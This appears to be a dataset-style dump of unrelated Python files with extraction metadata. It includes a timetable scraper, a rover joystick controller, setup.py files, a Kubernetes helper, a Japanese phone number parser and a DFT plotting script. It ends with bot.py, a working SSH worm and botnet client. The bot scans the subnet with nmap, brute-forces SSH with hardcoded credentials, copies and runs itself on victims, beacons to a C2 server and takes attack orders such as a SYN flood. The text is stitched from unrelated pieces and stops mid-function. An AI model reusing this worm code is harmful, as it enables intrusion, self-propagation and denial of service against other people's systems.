1871), False, 'import os\n'), ((1955, 2080), 'os.path.join', 'os.path.join', (['workdir', '"""compile/rsc/current/.scala-library-synthetic/current/rsc/index/scala-library-synthetics.jar"""'], {}), "(workdir,\n 'compile/rsc/current/.scala-library-synthetic/current/rsc/index/scala-library-synthetics.jar'\n )\n", (1967, 2080), False, 'import os\n'), ((1659, 1679), 'os.path.exists', 'os.path.exists', (['path'], {}), '(path)\n', (1673, 1679), False, 'import os\n'), ((1918, 1938), 'os.path.exists', 'os.path.exists', (['path'], {}), '(path)\n', (1932, 1938), False, 'import os\n'), ((2117, 2137), 'os.path.exists', 'os.path.exists', (['path'], {}), '(path)\n', (2131, 2137), False, 'import os\n')] |
# -*- coding: utf-8 -*-
from grab.spider import Spider
from schedule.models import Time
class TimeParser(Spider):
BASE = 'http://lp.edu.ua/poyasnennya-do-rozkladu'
initial_urls = [BASE]
def prepare(self):
super(TimeParser, self).prepare()
def shutdown(self):
super(TimeParser, self).shutdown()
@classmethod
def task_initial(self, grab, task):
for tr in grab.doc.select('//table[@class="timetable"]/tr')[1:]:
for key, td in enumerate(tr.select('./td')):
if key == 0:
time = Time.get_by_number(td.text())
if time:
pass
else:
time = Time(time_number=td.text().strip())
if key == 1:
tabletime = td.text().split(u'−')
time.time_start = tabletime[0].strip()
time.time_end = tabletime[1].strip()
self.save_time(time)
@classmethod
def save_time(self, time):
Time.add(time)
| [
"schedule.models.Time.add"
] | [((1052, 1066), 'schedule.models.Time.add', 'Time.add', (['time'], {}), '(time)\n', (1060, 1066), False, 'from schedule.models import Time\n')] |
import signal
import threading
from rover_mavros import MavrosRover
from joystick import Joystick
import copy
import time
def signal_handler(_, __, stop_callback):
print('stop event set')
stop_callback()
stopper = threading.Event()
class Control:
def __init__(self, joystick, rover):
self.joystick = joystick
self.rover = rover
self.rover.rc_throttle.v_min = -1.0
self.rover.rc_throttle.v_max = 1.0
self.cmd_throttle_value = 0.0
self.cmd_steering_value = 0.0
self.stop_flag = False
def run(self):
print('run')
while not self.stop_flag:
x = copy.copy(self.joystick.axis_states['x'])
y = copy.copy(self.joystick.axis_states['y'])
self.rover.set_throttle(-y)
self.rover.set_steering(-x)
self.rover.send_cmd()
time.sleep(0.002)
self.rover.release_rc()
print('stopped')
def stop(self):
self.stop_flag = True
if __name__ == '__main__':
rover = MavrosRover()
joystick = Joystick()
joystick.start()
control = Control(joystick, rover)
g = lambda singal, frame: signal_handler(signal, frame, control.stop)
signal.signal(signal.SIGINT, g)
control.run()
joystick.stop()
| [
"signal.signal",
"time.sleep",
"rover_mavros.MavrosRover",
"threading.Event",
"joystick.Joystick",
"copy.copy"
] | [((225, 242), 'threading.Event', 'threading.Event', ([], {}), '()\n', (240, 242), False, 'import threading\n'), ((1047, 1060), 'rover_mavros.MavrosRover', 'MavrosRover', ([], {}), '()\n', (1058, 1060), False, 'from rover_mavros import MavrosRover\n'), ((1077, 1087), 'joystick.Joystick', 'Joystick', ([], {}), '()\n', (1085, 1087), False, 'from joystick import Joystick\n'), ((1228, 1259), 'signal.signal', 'signal.signal', (['signal.SIGINT', 'g'], {}), '(signal.SIGINT, g)\n', (1241, 1259), False, 'import signal\n'), ((651, 692), 'copy.copy', 'copy.copy', (["self.joystick.axis_states['x']"], {}), "(self.joystick.axis_states['x'])\n", (660, 692), False, 'import copy\n'), ((709, 750), 'copy.copy', 'copy.copy', (["self.joystick.axis_states['y']"], {}), "(self.joystick.axis_states['y'])\n", (718, 750), False, 'import copy\n'), ((879, 896), 'time.sleep', 'time.sleep', (['(0.002)'], {}), '(0.002)\n', (889, 896), False, 'import time\n')] |
#!/usr/bin/env python3
from setuptools import setup, find_packages
setup(
name='pyobs-core',
version='0.13',
description='robotic telescope software',
author='<NAME>',
author_email='<EMAIL>',
packages=find_packages(include=['pyobs', 'pyobs.*']),
entry_points={
'console_scripts': [
'pyobs=pyobs.cli.pyobs:main',
'pyobsd=pyobs.cli.pyobsd:main',
],
'gui_scripts': [
'pyobsw=pyobs.cli.pyobsw:main',
]
},
python_requires='>=3.7',
install_requires=[
'scipy',
'paramiko',
'pandas',
'pytz',
'astropy',
'astroplan',
'PyYAML',
'numpy',
'sleekxmpp',
'py_expression_eval',
'requests'
],
extras_require={
'full': [
'photutils',
'lmfit',
'tornado',
'python-telegram-bot',
'sep;platform_system=="Linux"',
'pyinotify;platform_system=="Linux"',
'python-daemon;platform_system=="Linux"'
]
}
)
| [
"setuptools.find_packages"
] | [((226, 269), 'setuptools.find_packages', 'find_packages', ([], {'include': "['pyobs', 'pyobs.*']"}), "(include=['pyobs', 'pyobs.*'])\n", (239, 269), False, 'from setuptools import setup, find_packages\n')] |
from kubernetes import client
def prepare_secret(secret_kwargs=None):
if not secret_kwargs:
secret_kwargs = {}
secret = client.V1Secret(**secret_kwargs)
return secret
def create_secret(api_instance, secret, namespace="default"):
api_response = api_instance.create_namespaced_secret(
body=secret, namespace=namespace
)
return api_response
def prepare_volume(volume_kwargs=None):
if not volume_kwargs:
volume_kwargs = {}
volume = client.V1Volume(**volume_kwargs)
return volume
def create_volume(api_instance, volume, namespace="default"):
api_response = api_instance.create_namespaced_volume(
body=volume, namespace=namespace
)
return api_response
class StorageProvider:
def __init__(self, config):
self.config = config
self.core_api = client.CoreV1Api()
def provision(self):
pass
# Provision secrets
# for
# Provision volumes
| [
"kubernetes.client.V1Volume",
"kubernetes.client.V1Secret",
"kubernetes.client.CoreV1Api"
] | [((139, 171), 'kubernetes.client.V1Secret', 'client.V1Secret', ([], {}), '(**secret_kwargs)\n', (154, 171), False, 'from kubernetes import client\n'), ((492, 524), 'kubernetes.client.V1Volume', 'client.V1Volume', ([], {}), '(**volume_kwargs)\n', (507, 524), False, 'from kubernetes import client\n'), ((846, 864), 'kubernetes.client.CoreV1Api', 'client.CoreV1Api', ([], {}), '()\n', (862, 864), False, 'from kubernetes import client\n')] |
# Copyright © 2014, 2017 <NAME>
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# There is NO WARRANTY.
"""Initialize database tables for a new run, possibly copying
URL-source tables from a previous one."""
def setup_argp(ap):
ap.add_argument("-c", "--copy-from", action="store", type=int, metavar="N",
help="Copy URL-source tables from run number N.")
ap.add_argument("-x", "--exclude",
help="Comma-separated list of tables *not* to copy."
" (captured_pages and capture_detail are never copied.)")
ap.add_argument("-q", "--quiet",
help="Don't print any progress messages.")
def run(args):
from url_sources.newrun import make_new_run
make_new_run(args)
| [
"url_sources.newrun.make_new_run"
] | [((910, 928), 'url_sources.newrun.make_new_run', 'make_new_run', (['args'], {}), '(args)\n', (922, 928), False, 'from url_sources.newrun import make_new_run\n')] |
import os.path
from pants.backend.python.goals.setup_py import SetupKwargs, SetupKwargsRequest
from pants.engine.fs import DigestContents, GlobMatchErrorBehavior, PathGlobs
from pants.engine.rules import Get, collect_rules, rule
from pants.engine.target import Target
from pants.engine.unions import UnionRule
class VersionedSetupKwargsRequest(SetupKwargsRequest):
@classmethod
def is_applicable(cls, _: Target) -> bool:
# We always use our custom `setup()` kwargs generator for `python_distribution`
# targets in this repo.
return True
@rule
async def setup_kwargs_plugin(request: VersionedSetupKwargsRequest) -> SetupKwargs:
kwargs = {
"url": "https://github.com/CodeForAfrica/api",
"author": "Code for Africa",
"author_email": "<EMAIL>",
"license": "MIT",
"zip_safe": True,
}
kwargs |= request.explicit_kwargs.copy()
# Add classifiers. We preserve any that were already set.
standard_classifiers = [
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT",
"Operating System :: MacOS :: MacOS X",
"Operating System :: POSIX :: Linux",
"Programming Language :: Python",
"Topic :: Software Development :: Build Tools",
]
kwargs["classifiers"] = [*standard_classifiers, *kwargs.get("classifiers", [])]
project_urls = {
"Source": "https://github.com/CodeForAfrica/api",
"Tracker": "https://github.com/CodeForAfrica/api/issues",
"Twitter": "https://twitter.com/Code4Africa",
}
kwargs["project_urls"] = {**project_urls, **kwargs.get("project_urls", {})}
# version can be set to directly or via version_file relative to the BUILD file.
version = kwargs.get("version", None)
# version_file is not a standard kwarg, hence we need to pop it from kwargs.
version_file = kwargs.pop("version_file", None)
if version and version_file:
raise ValueError(
f"The python_distribution target {request.target.address} has supplied both "
"`version` and `version_file` in its setup_py's kwargs. Only one of these "
"should be supplied."
)
# we default to checking VERSION file if both version and version_file are not set
if not version:
version_file = version_file or "VERSION"
build_file_path = request.target.address.spec_path
version_path = os.path.join(build_file_path, version_file)
digest_contents = await Get(
DigestContents,
PathGlobs(
[version_path],
description_of_origin=f"the 'version_file' kwarg in {request.target.address}",
glob_match_error_behavior=GlobMatchErrorBehavior.error,
),
)
kwargs["version"] = digest_contents[0].content.decode().strip()
return SetupKwargs(kwargs, address=request.target.address)
def rules():
return (
*collect_rules(),
UnionRule(SetupKwargsRequest, VersionedSetupKwargsRequest),
)
| [
"pants.backend.python.goals.setup_py.SetupKwargs",
"pants.engine.rules.collect_rules",
"pants.engine.fs.PathGlobs",
"pants.engine.unions.UnionRule"
] | [((2873, 2924), 'pants.backend.python.goals.setup_py.SetupKwargs', 'SetupKwargs', (['kwargs'], {'address': 'request.target.address'}), '(kwargs, address=request.target.address)\n', (2884, 2924), False, 'from pants.backend.python.goals.setup_py import SetupKwargs, SetupKwargsRequest\n'), ((2987, 3045), 'pants.engine.unions.UnionRule', 'UnionRule', (['SetupKwargsRequest', 'VersionedSetupKwargsRequest'], {}), '(SetupKwargsRequest, VersionedSetupKwargsRequest)\n', (2996, 3045), False, 'from pants.engine.unions import UnionRule\n'), ((2962, 2977), 'pants.engine.rules.collect_rules', 'collect_rules', ([], {}), '()\n', (2975, 2977), False, 'from pants.engine.rules import Get, collect_rules, rule\n'), ((2554, 2723), 'pants.engine.fs.PathGlobs', 'PathGlobs', (['[version_path]'], {'description_of_origin': 'f"""the \'version_file\' kwarg in {request.target.address}"""', 'glob_match_error_behavior': 'GlobMatchErrorBehavior.error'}), '([version_path], description_of_origin=\n f"the \'version_file\' kwarg in {request.target.address}",\n glob_match_error_behavior=GlobMatchErrorBehavior.error)\n', (2563, 2723), False, 'from pants.engine.fs import DigestContents, GlobMatchErrorBehavior, PathGlobs\n')] |
import numpy as np
import sounddevice as sd
import matplotlib.pyplot as plt
import soundfile as sf
from scipy import signal
fs = 1000
time = np.arange(0,1,1/fs)
def sound_lenght(second=0):
x=int(fs*second)
return x
def DFT(x): # To calculate DFT of a 1D real-valued signal x
N = len(x)
n = np.arange(N)
k = n.reshape((N, 1))
e = np.exp(-2j * np.pi * k * n / N)
X = np.dot(e, x)
return X
amp=[0,1,0.1,0.01,0.001,0.0001]
s3_freq=120
s3_add_freq=100
s3_sound_length=1
s3_amp=amp[1]
sound=[]
for i in range (0,sound_lenght(s3_sound_length)):
sound.append(
0.5*np.sin(2*np.pi*(40)*i/fs)
#+0.5*np.sin(2*np.pi*(150)*i/fs)
+0.25*(np.random.rand()-0.5)
)
X = DFT(sound)
# calculate the frequency
N = len(X)
n = np.arange(N)
T = N/fs
freq = n/T
n_oneside = N//2
# get the one side frequency
f_oneside = freq[:n_oneside]
# normalize the amplitude
X_oneside =X[:n_oneside]/n_oneside
plt.figure(figsize = (12, 6))
plt.subplot(323)
plt.stem(f_oneside, abs(X_oneside), 'b', \
markerfmt=" ", basefmt="-b")
plt.xlabel('Freq (Hz)')
plt.ylabel('DFT Amplitude |X(freq)|')
plt.subplot(324)
plt.stem(f_oneside, abs(X_oneside), 'b', \
markerfmt=" ", basefmt="-b")
plt.xlabel('Freq (Hz)')
plt.xlim(0, 60)
plt.tight_layout()
plt.subplot(321)
plt.plot(time[0:200],sound[0:200])
A=0
B=0
fsound=[]
for i in range (0,N):
X=sound[i]
E=X+1.1429*A-0.4127*B
Y=0.067*E+0.135*A+0.067*B
fsound.append(Y)
B=A
A=E
f2sound=[]
for i in range (0,N):
X=fsound[i]
E=X+1.1429*A-0.4127*B
Y=0.067*E+0.135*A+0.067*B
f2sound.append(Y)
B=A
A=E
plt.subplot(322)
plt.plot(time[0:200],f2sound[0:200])
X1 = DFT(f2sound)
# calculate the frequency
N1= len(X1)
n1 = np.arange(N1)
T1 = N1/fs
freq1 = n1/T1
n_oneside1 = N1//2
# get the one side frequency
f_oneside1 = freq1[:n_oneside1]
# normalize the amplitude
X_oneside1 =X1[:n_oneside1]/n_oneside1
plt.figure(figsize = (12, 6))
plt.subplot(325)
plt.stem(f_oneside1, abs(X_oneside1), 'b', markerfmt=" ", basefmt="-b")
plt.xlabel('Freq (Hz)')
plt.ylabel('DFT Amplitude |X(freq)|')
plt.subplot(326)
plt.stem(f_oneside1, abs(X_oneside1), 'b', markerfmt=" ", basefmt="-b")
plt.xlabel('Freq (Hz)')
plt.xlim(0, 60)
plt.tight_layout()
plt.show()
| [
"numpy.random.rand",
"matplotlib.pyplot.ylabel",
"matplotlib.pyplot.xlabel",
"matplotlib.pyplot.plot",
"numpy.exp",
"matplotlib.pyplot.figure",
"numpy.dot",
"matplotlib.pyplot.tight_layout",
"numpy.sin",
"matplotlib.pyplot.xlim",
"matplotlib.pyplot.subplot",
"numpy.arange",
"matplotlib.pyplot.show"
] | [((142, 165), 'numpy.arange', 'np.arange', (['(0)', '(1)', '(1 / fs)'], {}), '(0, 1, 1 / fs)\n', (151, 165), True, 'import numpy as np\n'), ((828, 840), 'numpy.arange', 'np.arange', (['N'], {}), '(N)\n', (837, 840), True, 'import numpy as np\n'), ((1001, 1028), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(12, 6)'}), '(figsize=(12, 6))\n', (1011, 1028), True, 'import matplotlib.pyplot as plt\n'), ((1031, 1047), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(323)'], {}), '(323)\n', (1042, 1047), True, 'import matplotlib.pyplot as plt\n'), ((1129, 1152), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Freq (Hz)"""'], {}), "('Freq (Hz)')\n", (1139, 1152), True, 'import matplotlib.pyplot as plt\n'), ((1153, 1190), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""DFT Amplitude |X(freq)|"""'], {}), "('DFT Amplitude |X(freq)|')\n", (1163, 1190), True, 'import matplotlib.pyplot as plt\n'), ((1192, 1208), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(324)'], {}), '(324)\n', (1203, 1208), True, 'import matplotlib.pyplot as plt\n'), ((1290, 1313), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Freq (Hz)"""'], {}), "('Freq (Hz)')\n", (1300, 1313), True, 'import matplotlib.pyplot as plt\n'), ((1314, 1329), 'matplotlib.pyplot.xlim', 'plt.xlim', (['(0)', '(60)'], {}), '(0, 60)\n', (1322, 1329), True, 'import matplotlib.pyplot as plt\n'), ((1330, 1348), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (1346, 1348), True, 'import matplotlib.pyplot as plt\n'), ((1350, 1366), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(321)'], {}), '(321)\n', (1361, 1366), True, 'import matplotlib.pyplot as plt\n'), ((1367, 1402), 'matplotlib.pyplot.plot', 'plt.plot', (['time[0:200]', 'sound[0:200]'], {}), '(time[0:200], sound[0:200])\n', (1375, 1402), True, 'import matplotlib.pyplot as plt\n'), ((1700, 1716), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(322)'], {}), '(322)\n', (1711, 1716), True, 'import matplotlib.pyplot as plt\n'), ((1717, 1754), 'matplotlib.pyplot.plot', 'plt.plot', (['time[0:200]', 'f2sound[0:200]'], {}), '(time[0:200], f2sound[0:200])\n', (1725, 1754), True, 'import matplotlib.pyplot as plt\n'), ((1822, 1835), 'numpy.arange', 'np.arange', (['N1'], {}), '(N1)\n', (1831, 1835), True, 'import numpy as np\n'), ((2010, 2037), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(12, 6)'}), '(figsize=(12, 6))\n', (2020, 2037), True, 'import matplotlib.pyplot as plt\n'), ((2040, 2056), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(325)'], {}), '(325)\n', (2051, 2056), True, 'import matplotlib.pyplot as plt\n'), ((2129, 2152), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Freq (Hz)"""'], {}), "('Freq (Hz)')\n", (2139, 2152), True, 'import matplotlib.pyplot as plt\n'), ((2153, 2190), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""DFT Amplitude |X(freq)|"""'], {}), "('DFT Amplitude |X(freq)|')\n", (2163, 2190), True, 'import matplotlib.pyplot as plt\n'), ((2192, 2208), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(326)'], {}), '(326)\n', (2203, 2208), True, 'import matplotlib.pyplot as plt\n'), ((2281, 2304), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Freq (Hz)"""'], {}), "('Freq (Hz)')\n", (2291, 2304), True, 'import matplotlib.pyplot as plt\n'), ((2305, 2320), 'matplotlib.pyplot.xlim', 'plt.xlim', (['(0)', '(60)'], {}), '(0, 60)\n', (2313, 2320), True, 'import matplotlib.pyplot as plt\n'), ((2321, 2339), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (2337, 2339), True, 'import matplotlib.pyplot as plt\n'), ((2341, 2351), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (2349, 2351), True, 'import matplotlib.pyplot as plt\n'), ((314, 326), 'numpy.arange', 'np.arange', (['N'], {}), '(N)\n', (323, 326), True, 'import numpy as np\n'), ((361, 394), 'numpy.exp', 'np.exp', (['(-2.0j * np.pi * k * n / N)'], {}), '(-2.0j * np.pi * k * n / N)\n', (367, 394), True, 'import numpy as np\n'), ((401, 413), 'numpy.dot', 'np.dot', (['e', 'x'], {}), '(e, x)\n', (407, 413), True, 'import numpy as np\n'), ((621, 652), 'numpy.sin', 'np.sin', (['(2 * np.pi * 40 * i / fs)'], {}), '(2 * np.pi * 40 * i / fs)\n', (627, 652), True, 'import numpy as np\n'), ((721, 737), 'numpy.random.rand', 'np.random.rand', ([], {}), '()\n', (735, 737), True, 'import numpy as np\n')] |
import pytest
from _mock_data.url import internal_url
from browserist import Browser
@pytest.mark.parametrize("url, xpath, expected", [
(internal_url.EXAMPLE_COM, "/html/body/div/h1", True),
(internal_url.EXAMPLE_COM, "/html/body/div/p[2]/a", True),
(internal_url.W3SCHOOLS_COM, "//*[@id='main']/div[1]/div/h1", True),
(internal_url.W3SCHOOLS_COM, "//*[@id='main']/footer", True),
(internal_url.W3SCHOOLS_COM, "//*[@id='main']/div[14]/h2", True),
(internal_url.W3SCHOOLS_COM, "//*[@id='google_translate_element']", False),
])
def test_check_if_is_displayed(url: str, xpath: str, expected: bool, browser_default_headless: Browser) -> None:
browser = browser_default_headless
browser.open.url(url)
assert browser.check_if.is_displayed(xpath) is expected
| [
"pytest.mark.parametrize"
] | [((89, 549), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""url, xpath, expected"""', '[(internal_url.EXAMPLE_COM, \'/html/body/div/h1\', True), (internal_url.\n EXAMPLE_COM, \'/html/body/div/p[2]/a\', True), (internal_url.\n W3SCHOOLS_COM, "//*[@id=\'main\']/div[1]/div/h1", True), (internal_url.\n W3SCHOOLS_COM, "//*[@id=\'main\']/footer", True), (internal_url.\n W3SCHOOLS_COM, "//*[@id=\'main\']/div[14]/h2", True), (internal_url.\n W3SCHOOLS_COM, "//*[@id=\'google_translate_element\']", False)]'], {}), '(\'url, xpath, expected\', [(internal_url.EXAMPLE_COM,\n \'/html/body/div/h1\', True), (internal_url.EXAMPLE_COM,\n \'/html/body/div/p[2]/a\', True), (internal_url.W3SCHOOLS_COM,\n "//*[@id=\'main\']/div[1]/div/h1", True), (internal_url.W3SCHOOLS_COM,\n "//*[@id=\'main\']/footer", True), (internal_url.W3SCHOOLS_COM,\n "//*[@id=\'main\']/div[14]/h2", True), (internal_url.W3SCHOOLS_COM,\n "//*[@id=\'google_translate_element\']", False)])\n', (112, 549), False, 'import pytest\n')] |
# -*- coding=utf-8 -*-
from typing import Dict
import re
from . import data
from .exception import InvalidCharacterException, InvalidTelephoneNumberException
number_and_hyphen_regexp = re.compile(r'^[−ー0-90-9-]+$')
telephone_number_regexp = re.compile(r'^[0-90-9]{10,11}$') # ハイフン無し
telephone_number_with_hyphen_regex = re.compile(r'^[0-90-9]{2,4}[−ー-][0-90-9]{2,4}[−ー-][0-90-9]{3,4}$') # ハイフン有り
_translate_table = str.maketrans({
'0': '0',
'1': '1',
'2': '2',
'3': '3',
'4': '4',
'5': '5',
'6': '6',
'7': '7',
'8': '8',
'9': '9',
'ー': '-',
'−': '-',
})
def generate_dict(number: str, area_code_length: int, city_code_length: int) -> Dict[str, str]:
total_code_length = area_code_length + city_code_length
if len(number) < total_code_length:
raise InvalidTelephoneNumberException
return {
'area_code': number[:area_code_length],
'city_code': number[area_code_length:total_code_length],
'subscriber_code': number[total_code_length:],
}
def zenkaku_to_hankaku(number: str) -> str:
return number.translate(_translate_table)
def extract_number(src: str) -> str:
"""全角半角やハイフンが混じった文字列を半角数字のみの文字列にして返す"""
m = number_and_hyphen_regexp.fullmatch(src)
if not m:
raise InvalidCharacterException
return zenkaku_to_hankaku(m.string).replace('-', '')
def split(src: str) -> Dict[str, str]:
"""入力された文字列を辞書形式に分割して返す"""
number = extract_number(src)
# 固定電話
for codes in [data.area_code_5, data.area_code_4, data.area_code_3, data.area_code_2]:
for code in codes:
if number.startswith(code):
area_code_length = len(code)
city_code_length = data.TOTAL_CODE_LENGTH - area_code_length
return generate_dict(number, area_code_length, city_code_length)
# フリーダイヤル
for code in data.freedial_code:
if number.startswith(code):
return generate_dict(number, data.FREEDIAL_CODE_PREFIX_LENGTH, data.FREEDIAL_CODE_LENGTH)
# 携帯電話
for code in data.mobile_code:
if number.startswith(code):
return generate_dict(number, data.MOBILE_CODE_PREFIX_LENGTH, data.MOBILE_CODE_LENGTH)
# その他番号
for code in data.other_code:
if number.startswith(code):
return generate_dict(number, data.OTHER_CODE_PREFIX_LENGTH, data.OTHER_CODE_LENGTH)
raise InvalidTelephoneNumberException
def validate(src: str) -> bool:
if not telephone_number_regexp.fullmatch(src) and not telephone_number_with_hyphen_regex.fullmatch(src):
return False
try:
split(src)
except (InvalidTelephoneNumberException, InvalidTelephoneNumberException):
return False
return True
def normalize(src: str) -> str:
"""入力された文字列をハイフン区切りの電話番号にして返す"""
number = extract_number(src)
code = split(number)
return '{}-{}-{}'.format(code['area_code'], code['city_code'], code['subscriber_code'])
| [
"re.compile"
] | [((187, 215), 're.compile', 're.compile', (['"""^[−ー0-90-9-]+$"""'], {}), "('^[−ー0-90-9-]+$')\n", (197, 215), False, 'import re\n'), ((243, 274), 're.compile', 're.compile', (['"""^[0-90-9]{10,11}$"""'], {}), "('^[0-90-9]{10,11}$')\n", (253, 274), False, 'import re\n'), ((323, 388), 're.compile', 're.compile', (['"""^[0-90-9]{2,4}[−ー-][0-90-9]{2,4}[−ー-][0-90-9]{3,4}$"""'], {}), "('^[0-90-9]{2,4}[−ー-][0-90-9]{2,4}[−ー-][0-90-9]{3,4}$')\n", (333, 388), False, 'import re\n')] |
import os
from setuptools import setup
def read(fname):
return open(os.path.join(os.path.dirname(__file__), fname)).read()
setup(
name = "zeppelin_comm_layer",
version = "0.9.3",
author = "<NAME>",
author_email = "<EMAIL>",
description = ("A simulation of the Jupyter/IPython display/communication system "
"to allow libraries like Bokeh to run inline in Apache Zeppelin"),
license = "Apache License 2.0",
keywords = "zeppelin visualisations",
packages=['zeppelin_comm_layer'],
package_data={'zeppelin_comm_layer': ['js/*']},
long_description=read('Readme.md'),
classifiers=[
"Development Status :: 4 - Beta",
"Topic :: Utilities",
"Programming Language :: Python'",
"Programming Language :: Python :: 2'",
"Programming Language :: Python :: 3'"
]
) | [
"os.path.dirname"
] | [((86, 111), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (101, 111), False, 'import os\n')] |
#!/usr/bin/python
"""bot.py
External Dependencies:
nmap for network mapping
paramiko for ssh & sftp
"""
# standard lib
import logging
import os
import random
import socket
import stat
import struct
import subprocess
import sys
import threading
import time
# third-party lib
import nmap
import paramiko
# CONSTANTS
MASTER = '192.168.1.3' # C2 server IPv4 address
PORT = 1337
ID = socket.gethostbyname(socket.gethostname())
BOT_FILE_PATH = '/tmp/bot.py'
DELIMITER = '::'
MAX_THREAD = 100 # must be less than max thread limit
# GLOBALS
state = -1 # 0 ready, 1 attacking, 2 enrolled for attack, 3 stop attacking
credentials = [
('ubuntu', 'ubuntu'),
('pi', 'raspberry'),
('admin', 'password'),
('cpsc', 'cpsc')
]
logging.basicConfig(level=logging.INFO,
format='%(asctime)s PID:%(process)d %(threadName)s %(message)s',
datefmt='%H:%M:%S',
filename='/tmp/bot.log')
logger = logging.getLogger('')
##################################################################
# WORM
# A simple ssh worm that:
# 1. Uses nmap to scan the local subnet for IP systems which have
# ssh open on the default port, 22.
# 2. Attempts to gain access by bruteforce with a pre-set list
# of credentials
# 3. If connected, copy self to the victim and begin execution
# on the victim
##################################################################
def access_system(host):
""" Perform a brute force attack against a host system
@param host: hostname/ip of target system
@return: tuple of instance of paramiko SSH class, successful username,
succesful password; None otherwise
"""
global credentials
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
logger.info('Accessing {}'.format(host))
for (username, password) in credentials:
result = try_credentials(host, username, password, ssh)
if result == 0:
return (ssh, username, password)
logger.info('Could not access {}'.format(host))
return None
def get_targets(subnet):
""" Get list of target systems
@param subnet: the target subnet; example '192.168.1.1/24'
@return: list of potential target hosts with default ssh port open, 22
"""
nm = nmap.PortScanner()
hosts = []
nm.scan(subnet, arguments='-p 22 --open')
hosts = nm.all_hosts()
targets = []
for host in hosts:
if nm[host].state() == 'up' and host != MASTER and \
host != ID and not host.startswith('127.'):
targets.append(host)
return targets
def spread(sshclient):
""" Spread to target victim system and start the bot
@param sshclient: instance of paramiko SSH class connected to a system
"""
sftp = sshclient.open_sftp()
sftp.put(os.path.abspath(sys.argv[0]), BOT_FILE_PATH)
sftp.chmod(BOT_FILE_PATH, stat.S_IRWXO | stat.S_IRWXG | stat.S_IRWXU)
sftp.close()
sshclient.exec_command('python ' + BOT_FILE_PATH)
#sshclient.exec_command('python3 ' + BOT_FILE_PATH)
def try_credentials(host, username, password, sshclient):
""" Try connecting to a host with a set of credentials
@param host: hostname/ip of target system
@param username: username to try
@param password: password to try
@param sshclient: instance of paramiko SSH class
@return: 0 for success; -1 for socket error;
1 for wrong credentials, maybe
"""
try:
sshclient.connect(host, username=username, password=password)
except paramiko.AuthenticationException:
return 1
except paramiko.SSHException:
return 1
except socket.error:
return -1
return 0
def worm_driver(target):
""" Driver for the worm
@param target: ipv4 address of beginning target
@side-effect: when done, sets bot state to ready
"""
logger.info('LOADING WORM')
global state
state = 1
targets = get_targets(target + '/24')
logger.info('worm targets: {}'.format(targets))
for target in targets:
sshInfo = access_system(target)
if sshInfo:
sftp = sshInfo[0].open_sftp()
try:
sftp.get(BOT_FILE_PATH, '/tmp/' + target + '.txt')
logger.info('{} is a friend'.format(target))
except IOError:
logger.info('Infecting {}'.format(target))
spread(sshInfo[0])
finally:
os.remove('/tmp/' + target + '.txt')
sftp.close()
sshInfo[0].close()
state = 0
logger.info('TERMINATING WORM')
##################################################################
# BOT
# Communication is transmitted via UDP
# Messages accepted from C2 server:
# 'ROLL': roll call to check for bot's state
# 'ATCK': launch an attack; see atck_command for more details
# 'STOP': terminate active attacks
# Messages sent to C2 server:
# 'HELO': tells the C2 server that bot is up
# 'REDY': response to 'ROLL' for bot in ready state
# 'BUSY': response to 'ROLL' for bot not in ready state
# NOTE: raw sockets & scapy module require root privileges
##################################################################
def atck_command(tokens):
""" Processes an attack message from the C2 server
Attack 0: spread bot
Attack 1: syn flood
NOTE: remember to check for stopping state in the attacks and
to reset to ready state when attack ends
@param tokens: tokenized attack command in the following format:
['ATCK', <int for attack type>, <target IPv4 address>]
@side-effect: sets bot state to attacking
"""
global state
if state != 2: # check for enrolled state
return
try:
atck_type = int(tokens[1])
target = tokens[2]
state = 1
logger.info('Starting attack {} on {}'.format(atck_type, target))
if target == MASTER or target.startswith('127.'):
state = 0
return
if atck_type == 0: # spread the bot, ignores stop command
worm_driver(target)
elif atck_type == 1: # syn flood
syn_flood(target)
except (ValueError, IndexError):
return
def hello():
""" Sends a 'HELO' message to the C2 server every minute
"""
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
while True:
sock.sendto('HELO', (MASTER, PORT))
#sock.sendto(bytes('HELO', 'utf-8'), (MASTER, PORT))
time.sleep(60)
sock.close()
def process_commands(message):
""" Processes commands received from the C2 server
@param message: message from the C2 server
"""
tokens = message.split(DELIMITER)
command = tokens[0]
if command == 'ROLL':
roll_command()
elif command == 'ATCK':
atck_command(tokens)
elif command == 'STOP':
stop_command()
else:
return
def roll_command():
""" Sends a 'REDY' message if bot is in ready state, 'BUSY' otherwise
"""
global state
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
if state == 0:
state = 2
sock.sendto('REDY', (MASTER, PORT))
#sock.sendto(bytes('REDY', 'utf-8'), (MASTER, PORT))
else:
sock.sendto('BUSY', (MASTER, PORT))
#sock.sendto(bytes('BUSY', 'utf-8'), (MASTER, PORT))
sock.close()
def stop_command():
""" Terminate any active attacks
@side- effect: sets bot state to ready
"""
global state
state = 3
time.sleep(5) # should be long enough for attack threads to see stop state
state = 0
def syn_flood(target):
""" Perform a syn flood on target system
@param target: IPv4 of system to attack
"""
count = 0
while state == 1 and count < MAX_THREAD:
count = count + 1
